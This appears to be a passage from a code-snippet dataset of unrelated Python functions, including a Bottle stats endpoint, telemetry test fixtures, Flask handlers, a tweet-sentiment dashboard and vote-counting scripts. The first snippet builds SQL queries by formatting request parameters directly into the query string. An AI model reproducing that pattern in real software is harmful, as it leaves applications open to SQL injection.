w_acts = [\"action='%s'\" % act for act in bottle.request.query.get('actions').strip().split(',')]\n w_acts = 'AND (%s)' % ' OR '.join(w_acts) if w_acts else ''\n f_value = 'AVG(latency)' if y_axis.startswith('avg') else 'COUNT(timestamp)'\n atomic = 1 if y_axis in ['aops', 'avgl'] else 0\n\n db_conn = tools.get_db_conn('%s.db' % bottle.request.query.test_run_id)\n sql = 'SELECT test_run_status, timestamp_started, timestamp_completed FROM 
info LIMIT 1'\n status, started, finished = tools.db_query(db_conn, sql)[1][0]\n progress = int(float(finished) - float(started)) if finished \\\n else int(tools.get_timestamp() - float(started))\n\n sql = 'SELECT substr(timestamp, 0, 11), code, %s FROM recs ' % f_value + \\\n 'WHERE atomic=%s %s GROUP BY code, substr(timestamp, 0, 11) ' % (atomic, w_acts) + \\\n 'ORDER BY id DESC LIMIT 3600' # last 1 hour activity\n\n result = tools.db_query(db_conn, sql)[1] if finished else tools.db_query(db_conn, sql)[1][:-1]\n result = list(reversed(result))\n results = {str(abs(int(item[0]) - int(float(started)))):\n {'failed': 0, 'passed': 0, 'incomplete': 0} for item in result}\n for item in result: # item[0] - timestamp, item[1] - code (None if incomplete), item[2] - value\n timestamp = str(int(item[0]) - int(float(started)))\n value = item[2] or 0\n results[timestamp]['failed'] += value if item[1] and item[1] != 200 else 0\n results[timestamp]['passed'] += value if item[1] == 200 else 0\n results[timestamp]['incomplete'] += value if item[1] == None else 0\n results = [{'timestamp': key, 'failed': value['failed'], 'passed': value['passed'],\n 'incomplete': value['incomplete']} for key, value in results.items()]\n result = {bottle.request.query.slave: results, 'status': status,\n 'started': started, 'finished': finished or '(not finished)', 'progress': progress}\n return '{0}({1})'.format(callback, result)", "def power_timeline():\n\n return [\n {\n \"timestamp\": \"2021-09-14T12:37:37.168817\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:37.669237\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:38.170142\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:38.670338\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:39.171321\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:39.671572\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:40.172503\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:40.672693\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:41.173552\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:41.673815\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:42.174560\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:42.674690\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:43.175441\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:43.675743\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:44.176551\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:44.677307\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n 
},\n {\n \"timestamp\": \"2021-09-14T12:37:45.178049\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:45.678310\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:46.179120\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:46.679308\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:47.180223\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:47.680468\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:48.181316\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:48.681683\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:49.182522\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:49.682731\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:50.183680\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:50.683812\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:51.184792\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:51.685027\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:52.185709\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:52.686065\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:53.186929\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:53.687190\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:54.188031\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:54.688674\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:55.189489\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:55.690299\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:56.191124\",\n \"sensor\": \"formula_group\",\n \"target\": \"all\",\n \"power\": 42,\n },\n\n ]", "def timed_recipes():\n time = request.args.get('time', 0, type=int) #raw input from HTML page\n global time_global\n time_global = time #sets global time to inputted time, for use in search function\n return jsonify(cooktime=time_global) #returns a confirmation of the input tiime", "def hourly_stats():\r\n count_total.delay()\r\n count_unique.delay()\r\n count_tags.delay()", "def genStats(data, printStats = 0):\n fVotes = open('/home/eduardo/ForestWatchers/ann2besttile/results/votes.txt','w')\n tileCount = []\n numberTasks 
= len(data)\n for task in range(numberTasks):\n tileCount.append([0] * 12)\n numberResults = len(data[task])\n fVotes.write(str(task)+\" \")\n for result in range(numberResults):\n fVotes.write(data[task][result]['answer']+\" \")\n if data[task][result]['answer'] == '2011352':\n tileCount[task][0] += 1\n elif data[task][result]['answer'] == '2011353':\n tileCount[task][1] += 1\n elif data[task][result]['answer'] == '2011355':\n tileCount[task][2] += 1\n elif data[task][result]['answer'] == '2011357':\n tileCount[task][3] += 1\n elif data[task][result]['answer'] == '2011358':\n tileCount[task][4] += 1\n elif data[task][result]['answer'] == '2011359':\n tileCount[task][5] += 1\n elif data[task][result]['answer'] == '2011360':\n tileCount[task][6] += 1\n elif data[task][result]['answer'] == '2011361':\n tileCount[task][7] += 1\n elif data[task][result]['answer'] == '2011362':\n tileCount[task][8] += 1\n elif data[task][result]['answer'] == '2011363':\n tileCount[task][9] += 1\n elif data[task][result]['answer'] == '2011364':\n tileCount[task][10] += 1\n elif data[task][result]['answer'] == '2011365':\n tileCount[task][11] += 1\n fVotes.write(\"\\n\")\n #Print info for debug\n if printStats == 1:\n print \"Stats for task \" + str(task)\n print \"Tile 00 (352) = \" + str(tileCount[task][0])\n print \"Tile 01 (353) = \" + str(tileCount[task][1])\n print \"Tile 02 (355) = \" + str(tileCount[task][2])\n print \"Tile 03 (357) = \" + str(tileCount[task][3])\n print \"Tile 04 (358) = \" + str(tileCount[task][4])\n print \"Tile 05 (359) = \" + str(tileCount[task][5])\n print \"Tile 06 (360) = \" + str(tileCount[task][6])\n print \"Tile 07 (361) = \" + str(tileCount[task][7])\n print \"Tile 08 (362) = \" + str(tileCount[task][8])\n print \"Tile 09 (363) = \" + str(tileCount[task][9])\n print \"Tile 10 (364) = \" + str(tileCount[task][10])\n print \"Tile 11 (365) = \" + str(tileCount[task][11])\n print \"Maximum value = \" + str(max(tileCount[task]))\n print \"Position = \" + str(tileCount[task].index(max(tileCount[task])))\n print \"\"\n fVotes.close()\n return tileCount", "def cowreport():\n central = pytz.timezone(\"America/Chicago\")\n yesterday = (utc() - datetime.timedelta(days=1)).astimezone(central)\n midnight = yesterday.replace(hour=0, minute=0)\n midutc = midnight.astimezone(pytz.UTC)\n begints = midutc.strftime(\"%Y-%m-%dT%H:%M\")\n endts = (midutc + datetime.timedelta(hours=24)).strftime(\"%Y-%m-%dT%H:%M\")\n api = (\n f\"http://iem.local/api/1/cow.json?begints={begints}&endts={endts}&\"\n \"phenomena=SV&phenomena=TO&lsrtype=SV&lsrtype=TO\"\n )\n data = requests.get(api, timeout=60).json()\n st = data[\"stats\"]\n if st[\"events_total\"] == 0:\n text = \"No SVR+TOR Warnings Issued.\"\n html = f\"<h3>IEM Cow Report</h3><pre>{text}</pre>\"\n txt = f\"> IEM Cow Report\\n{text}\\n\"\n return txt, html\n\n vp = st[\"events_verified\"] / float(st[\"events_total\"]) * 100.0\n text = (\n f\"SVR+TOR Warnings Issued: {st['events_total']:3.0f} \"\n f\"Verified: {st['events_verified']:3.0f} [{vp:.1f}%]\\n\"\n \"Polygon Size Versus County Size \"\n f\"[{st['size_poly_vs_county[%]']:.1f}%]\\n\"\n \"Average Perimeter Ratio \"\n f\"[{st['shared_border[%]']:.1f}%]\\n\"\n \"Percentage of Warned Area Verified (15km) \"\n f\"[{st['area_verify[%]']:.1f}%]\\n\"\n \"Average Storm Based Warning Size \"\n f\"[{st['avg_size[sq km]']:.0f} sq km]\\n\"\n f\"Probability of Detection(higher is better) [{st['POD[1]']:.2f}]\\n\"\n f\"False Alarm Ratio (lower is better) [{st['FAR[1]']:.2f}]\\n\"\n f\"Critical Success Index 
(higher is better) [{st['CSI[1]']:.2f}]\\n\"\n )\n\n html = f\"<h3>IEM Cow Report</h3><pre>{text}</pre>\"\n txt = f\"> IEM Cow Report\\n{text}\\n\"\n\n return txt, html", "def _calc_times():\n app.logger.debug(\"Got a JSON request\")\n km = request.args.get('km', 0, type=float)\n begin_date = request.args.get('begin_date')\n begin_time = request.args.get('begin_time')\n arrow_start = arrow.get(begin_date + \" \" + begin_time + \":00\")\n brevet_dist = request.args.get('brevet_dist', 999, type=int)\n app.logger.debug(\"km={}\".format(km))\n app.logger.debug(\"request.args: {}\".format(request.args))\n # FIXME: These probably aren't the right open and close times\n # and brevets may be longer than 200km\n percent120 = brevet_dist * 1.2\n possible_brev = [200, 300, 400, 600, 1000]\n if brevet_dist not in possible_brev:\n note = \"Current brevet distance is abnormal. Choose from 200, 300, 400, 600, or 1000\"\n elif km > percent120:\n note = \"Control location is more than 20% over the selected distance.\"\n else:\n note = \"\"\n open_time = acp_times.open_time(km, brevet_dist, arrow_start.isoformat())\n close_time = acp_times.close_time(km, brevet_dist, arrow_start.isoformat())\n result = {\"open\": open_time, \"close\": close_time, \"note\": note}\n return flask.jsonify(result=result)", "def _disp_times():\n fields = request.args.get('fields', type=str)\n format_type = request.args.get('format', type=str)\n top = request.args.get('top', type=int)\n token = request.args.get('token', type=str)\n results = {}\n\n result, length, code = retrieve(token, format_type, top, request_table[fields])\n return flask.jsonify(result=result, length=length, code=code)\n\n # elif code == 401: # Unauthorized\n # app.logger.debug(\"Token Expired! Let's log the user out.\")\n # return render_template('calc.html')", "def trends(max: int = None, until: str = None):\n for post in client.trends(max=max, until=until):\n print(json.dumps(post))", "def moderator_points():\n moderators = {}\n collection = constants.DB.moderators\n\n community_managers = [\n moderator[\"account\"] for moderator in\n collection.find({\"supermoderator\": True})]\n\n utopian_fest = constants.UTOPIAN_FEST.col_values(1)\n\n for moderator in set(community_managers + utopian_fest):\n moderators.setdefault(moderator, 0)\n if moderator in community_managers:\n moderators[moderator] += 100.0\n\n # Check for BOSSPOEM or TECHSLUT\n if moderator == \"espoem\" or moderator == \"techslut\":\n moderators[moderator] = 400.0\n\n # Utopian Fest bonus\n if moderator in utopian_fest:\n moderators[moderator] += 50.0\n\n # Save dictionary as JSON with date of last Thursday\n with open(\n f\"/home/amos/utopian/utopian/static/{constants.THIS_WEEK}.json\",\n \"w\") as fp:\n json.dump(moderators, fp, indent=4)", "def update_tweets_feed(n):\n \n # Retrieve the tweets\n first_tweet = get_value(df_1t, n)\n second_tweet = get_value(df_2t, n) \n third_tweet = get_value(df_3t, n)\n fourth_tweet = get_value(df_4t, n)\n fifth_tweet = get_value(df_5t, n)\n sixth_tweet = get_value(df_6t, n)\n seventh_tweet = get_value(df_7t, n)\n eighth_tweet = get_value(df_8t, n)\n nineth_tweet = get_value(df_9t, n)\n tenth_tweet = get_value(df_10t, n) \n \n # Compute the sentiment of each tweet\n sa_first_tweet = sentiment_analyzer_scores(first_tweet)\n sa_second_tweet = sentiment_analyzer_scores(second_tweet)\n sa_third_tweet = sentiment_analyzer_scores(third_tweet)\n sa_fourth_tweet = sentiment_analyzer_scores(fourth_tweet)\n sa_fifth_tweet = sentiment_analyzer_scores(fifth_tweet)\n 
sa_sixth_tweet = sentiment_analyzer_scores(sixth_tweet)\n sa_seventh_tweet = sentiment_analyzer_scores(seventh_tweet)\n sa_eighth_tweet = sentiment_analyzer_scores(eighth_tweet)\n sa_nineth_tweet = sentiment_analyzer_scores(nineth_tweet)\n sa_tenth_tweet = sentiment_analyzer_scores(tenth_tweet)\n \n # Return the tweet contents and a pie graph of the sentiment.\n \n return html.Div([\n html.Div([\n\n# First Tweet\n html.Div([\n html.Div([\n html.Pre(str(first_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '2px 2px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px',\n }\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_first_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\", }\n ),\n ], \n className = 'row' \n ),\n \n# Second Tweet\n \n html.Div([\n html.Div([\n html.Pre(str(second_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_second_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n \n # Third Tweet\n \n html.Div([\n html.Div([\n html.Pre(str(third_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_third_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n \n # Fourth Tweet\n \n html.Div([\n html.Div([\n html.Pre(str(fourth_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_fourth_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n\n\n # Fifth Tweet\n \n html.Div([\n html.Div([\n html.Pre(str(fifth_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_fifth_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n \n\n # Sixth Tweet\n html.Div([\n html.Div([\n html.Pre(str(sixth_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_sixth_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n \n # Seventh Tweet\n \n html.Div([\n html.Div([\n html.Pre(str(seventh_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 
'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n \n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_seventh_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n\n # Eighth Tweet\n \n html.Div([\n html.Div([\n html.Pre(str(eighth_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n \n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_eighth_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n\n # Nineth\n \n html.Div([\n html.Div([\n html.Pre(str(nineth_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_nineth_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n\n # Tenth Tweet\n \n html.Div([\n html.Div([\n html.Pre(str(tenth_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_tenth_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n ], style = {'overflowY': 'scroll', 'overflowX': 'hidden',\n 'maxHeight': '105ex', 'backgroundColor' : '#eaeaea'}\n ),\n \n ])", "def procfs_timeline():\n\n return [\n {\n \"timestamp\": \"2021-09-14T12:37:37.168817\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:37.669237\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:38.170142\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:38.670338\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:39.171321\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 
8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:39.671572\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:40.172503\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:40.672693\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:41.173552\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:41.673815\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:42.174560\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:42.674690\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:43.175441\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:43.675743\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:44.176551\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n 
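# per-cgroup CPU usage in percent; the gap between the summed usage and\n # global_cpu_usage is presumably CPU time spent outside the monitored cgroups\n 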
\"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:44.677307\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:45.178049\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:45.678310\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:46.179120\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:46.679308\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:47.180223\",\n \"sensor\": 